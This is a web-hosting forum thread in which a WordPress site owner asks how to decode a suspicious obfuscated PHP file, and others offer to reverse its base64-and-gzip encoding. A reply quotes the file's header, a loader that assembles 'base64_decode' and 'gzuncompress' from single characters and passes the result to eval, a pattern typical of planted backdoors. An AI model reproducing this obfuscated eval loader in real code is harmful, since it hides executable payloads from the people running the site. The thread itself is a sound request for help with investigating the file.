New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
mystery php file question
I have come across a mystery php file in one of my WordPress sites. The whole file is code. What can I use to convert it so I can see what it is doing? Prefer something in Linux but I can use Windows too.
This is just a snip of the code so you can tell what I talking about.
esPYW4QeymzzfE8Wanm75dnjzFieY1RUxja+T2uiF/DmJvHH18v3GF4Oi63rg2t7OLIfQ
X1HMRWV+rozdwaePS4j4W3Sedzwzqj0u71mFRgBr0VrCXsi43T754ymamrCexBJOzF7JGhHNL
J1VfjJ+X4w9seyHIyhfDlm6PXZ++zhMGlRO5p2GLUtQdggiuBVbB1U9MsNvJ14L5cz6bDxGXvCJh
NIQyBEXm93HO7/9oTdhQaWYNgTbi10QP4uMA44XURNm2wXGx14qnoDLiFCAtYZOm8Xpu
/e+/CRabqg0AF6Bo0N85mtyqCAzQuip9uXzz6mr189EY7E8SjkfZ6p3vw0uxR9m6IGtYJGa9M0
GH99kBvj9zS0JXxari4B
Comments
pastebin.com all the contents.
well is it ioncube encoded? or just base64 encoded? basically could you show the header of the file?
@timnboys Looks like base64 and it is uncompressing something.
`<?php $wpconfig = "b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";$wordpress1 = "g" . "z" . "u" . "n" . "c" . "o" . "m" . "p" . "r" . "e" . "s" . "s";eval/test*
/(/test*/$wordpress1/test*/(/test*/$wpconfig('eNq9fflTU0nX8L/yTNXUDHwE3qyQjB/
okay just pastebin the contents as I can easily decode the base64 for you.
Also it looks like a half baked obfuscation system someone used either give me the contents in pm or whatever and I will decode it for you and get the base code back.
as they use base64+gzip deflate alot thinking it really obfuscates the code when it doesn't and can easily be decoded back by people like me who know its structure etc
@timnboys I sent it over as a PM. Are you hand decoding or is there something I can run to decode myself if this happens again? Thank you for your help.
And that's was the time someone on LET was tricked into cracking a bad obfuscated proprietary code.
@Aga said:
lol
Redacted
Considering that's just a bad obfuscated hack I still like my version of the story better :P
Anyone that can "crack" (rather: reverse) it has an idea what it does then also - i doubt they'd just send back the unencoded file if they notice it is WHMCS core licensing file or whatever.
I agree with you, maybe it was not very clear but my comment was meant to be a joke.
Really because your comments come off as mean sorry but that is how it appears to me.
And if it was a joke but didn't sound like one at least put something like it was a joke or something so people don't think your being serious(as propriety code is very important and I don't want to let no one cheat the dev/author of something from their well deserved hard earned cash.)
@timnboys Thank you for your help I really appreciate it.